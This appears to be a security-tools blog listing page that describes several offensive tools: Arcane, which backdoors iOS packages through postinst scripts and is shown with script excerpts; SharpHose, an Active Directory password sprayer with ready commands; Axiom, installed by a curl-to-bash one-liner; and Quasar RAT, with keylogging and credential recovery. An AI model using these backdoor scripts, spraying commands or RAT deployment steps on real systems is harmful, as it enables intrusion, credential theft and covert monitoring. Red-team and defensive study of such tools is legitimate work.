Arcane – Tool To Backdoor iOS Packages (iPhone ARM)
Arcane is a simple script tool to backdoor iOS packages (iPhone ARM) and create the necessary resources for APT repositories.
It was created to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
How Arcane Tool To Backdoor iOS Package Works
It’s possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the postinst file to execute commands during the installation.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
# The "post-installation" file. This file is generally responsible # for executing commands on the OS after installing the required # files. It's utilized by developers to manage and maintain various # aspects of an installation. Arcane abuses this functionality by # appending malicious Bash commands to the file. postinst="$tmp/DEBIAN/postinst"; # A function to handle the type of command execution embedded into the # postinst file. function inject_backdoor () { # If --file is used, `cat` the command(s) into the postinst file. if [[ "$infile" ]]; then cat "$infile" >> "$postinst"; embed="[$infile]"; else # If no --file, utilize the simple Bash payload, previously # defined. echo -e "$payload" >> "$postinst"; embed="generic shell command"; fi; status "embedded $embed into postinst" "error embedding backdoor"; chmod 0755 "$postinst" }; |
The control file contains values that package management tools use when installing packages. Arcane will either modify an existing control or create it.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
# The "control" file template. Most iOS packages will include a # control file. In the event one is not found, Arcane will use the # below template. The `$hacker` variable is used here to occupy # various arbitrary fields. # https://www.debian.org/doc/manuals/maint-guide/dreq.en.html controlTemp="Package: com.$hacker.backdoor Name: $hacker backdoor Version: 1337 Section: app Architecture: iphoneos-arm Description: A backdoored iOS package Author: $hacker <https://$hacker.github.io/> Maintainer: $hacker <https://$hacker.github.io/>"; ... # An `if` statement to check for the control file. if [[ ! -f "$tmp/DEBIAN/control" ]]; then # If no control is detected, create it using the template. echo "$controlTemp" > "$tmp/DEBIAN/control"; status "created control file" "error with control template"; else # If a control file exists, Arcane will simply rename the package # as it appears in the list of available Cydia applications. This # makes the package easier to location in Cydia. msg "detected control file" succ; sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control"; status "modified control file" "error with control"; fi; |
How to install Arcane Tool To Backdoor iOS Packages
Recommended for Kali v2020.3:
|
1 2 3 4 |
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies sudo git clone https://github.com/tokyoneon/arcane /opt/arcane sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane chmod +x arcane.sh;./arcane.sh --help |
You can download Arcane here:
Or read more here.
Topic: Hacking Tools
SharpHose – Asynchronous Password Spraying Tool
SharpHose is an asynchronous password spraying tool in C# for Windows environments that takes into consideration fine-grained password policies and can be run over Cobalt Strike’s execute-assembly.
It provides a flexible way to interact with Active Directory using domain-joined and non-joined contexts, while also being able to target specific domains and domain controllers. The tool takes into consideration the domain password policy, including fine-grained password policies, in an attempt to avoid account lockouts.
Fine-grained password policies are enumerated for the users and groups that the policy applies to. If the policy applied also to groups, the group users are captured. All enabled domain users are then classified according to their password policies, in order of precedence, and marked as safe or unsafe. The remaining users are filtered against an optional user-supplied exclude list.
Besides just spraying, red team operators can view all of the password policies for a domain, all the users affected by the policy, or just view the enabled domain users. Output can be sent directly to the console or to a user-supplied output folder.
Asynchronous Password Spraying Tool for LDAP
Active Directory spraying nozzle using the LDAP protocol:
- Asynchronous spraying for faster, but not too fast, results
- Domain joined and non-joined spraying
- Tight integration w/ domain password policies and fine grained password policies
- Smart lockout prevention (lockoutThreshold n-1 just to be safe)
- Optionally spray to specific domains and domain controllers
- View password policies and the affected users
Using SharpHose Asynchronous Password Spraying Tool
Domain Joined Spray w/o Interaction
|
1 |
SharpHose.exe --action SPRAY_USERS --spraypassword Spring2020! --output c:\temp\ --auto |
Domain Joined Spray w/ Exclusions
|
1 |
SharpHose.exe --action SPRAY_USERS --spraypassword Spring2020! --output c:\temp\ --exclude c:\temp\exclusion_list.txt |
Non-Domain Joined Spray
|
1 |
SharpHose.exe --action SPRAY_USERS --spraypassword Spring2020! --domain lab.local --username demo --password DemoThePlanet --output c:\temp\ |
Domain Joined Show Policies
Active Directory stores durations in negative large integer values which need to lapse after the last lockoutThreshold is exceeded.
|
1 |
SharpHose.exe --action GET_POLICIES --output c:\temp\ |
You can download SharpHose here:
Or read more here.
Topic: Password Cracking Tools
Axiom – Pen-Testing Server For Collecting Bug Bounties
Project Axiom is a set of utilities for managing a small dynamic infrastructure setup for bug bounty, basically a pen-testing server out of the box with 1-line.
With Axiom, you just need to run a single command to get setup, and then you can use the Axiom toolkit scripts to spin up and down your new hacking VPS.
Setting up your own ‘hacking vps’, to catch shells, run enumeration tools, scan, let things run in the background in a tmux window, used to be an afternoon project – running into a whole day sometimes if you hit some package isues or ‘dependency hell’. You would run through and install all the tools you need manually, configure your ZSH, configure vim, configure tmux and be ready to rock..at some point.
Thank goodness for Axiom!
Install Axiom Pen-testing Server with Bash One Liner
You will need curl, which is not installed by default on Ubuntu 20.04, if you get a “command not found” error, run sudo apt update && sudo apt install curl)
|
1 |
bash <(curl -s https://raw.githubusercontent.com/pry0cc/axiom/master/interact/axiom-configure) |
You also need a Digital Ocean API key, to get one you can sign up here and get $100 in credit over 60 days: https://m.do.co/c/5296ccf18d6f
OS Support for Axiom Pen-testing Server
Axiom current supported list of operating systems:
- MacOS – Supported
- Ubuntu – Supported
- Debian – Semi-Supported – Planned
- Arch Linux – Semi-Support – Planned
- Kali – Unknown
You can download Axiom here:
Or read more here.
Topic: Hacking Tools
Quasar RAT – Windows Remote Administration Tool
Quasar is a fast and light-weight Windows remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring.
It aims to provide high stability and an easy-to-use user interface and is a free, open source tool.
Features of Quasar RAT Windows Remote Administration Tool
The main features that can be found in Quasar are:
- TCP network stream (IPv4 & IPv6 support)
- Fast network serialization (Protocol Buffers)
- Compressed (QuickLZ) & Encrypted (TLS) communication
- UPnP Support
- Task Manager
- File Manager
- Startup Manager
- Remote Desktop
- Remote Shell
- Remote Execution
- System Information
- Registry Editor
- System Power Commands (Restart, Shutdown, Standby)
- Keylogger (Unicode Support)
- Reverse Proxy (SOCKS5)
- Password Recovery (Common Browsers and FTP Clients)
Using Quasar Windows Remote Administration Tool
1. Download Quasar
Usually most users want the stable version of Quasar, which can be found on the releases page. Bleeding edge versions with latest features, improvements and bug-fixes can are located at the CI server. These builds should be used with caution as they may contain critical bugs.
2. Building a Client
After starting Quasar.exe for the first time, you will need to build a client for deployment. Use the button Builder at the top of the Quasar application to start the client configuration. After configuring the client for your needs, click the Build button and choose a location to save the built client.
3. Connecting the Server and Client
The standalone client from the previous step has to be deployed on the computers of the users. Simply executing the client on the computers is enough. The client will take care of the installation, startup, etc… Once installed the client will try to connect to your Server on the specified host-name and port. It might be necessary to set up port forwarding to your local Server if it is behind a firewall in your network. You can use automatic forwarding with UPnP in the settings if it’s being supported by your firewall/router.
You can download Quasar here:
Or read more here.
Topic: Hacking Tools
Pingcastle – Active Directory Security Assessment Tool
PingCastle is a Active Directory Security Assessment Tool designed to quickly assess the Active Directory security level with a methodology based on a risk assessment and maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise. The risk level regarding Active Directory security has changed. Several vulnerabilities have been […]
Topic: Security Software
Second Order – Subdomain Takeover Scanner Tool
Second Order Subdomain Takeover Scanner Tool scans web applications for second-order subdomain takeover by crawling the application and collecting URLs (and other data) that match specific rules or respond in a specific way. Using Second Order Subdomain Takeover Scanner Tool Command line options:
|
1 2 3 4 5 6 7 8 |
-base string Base link to start scraping from (default "http://127.0.0.1") -config string Configuration file (default "config.json") -debug Print visited links in real-time to stdout -output string Directory to save results in (default "output") |
Example:
|
1 |
go run second-order.go -base https://example.com -config config.json -output example.com -concurrency 10 |
Config File for Second Order Subdomain Takeover Scanner Tool […]
Topic: Networking Hacking Tools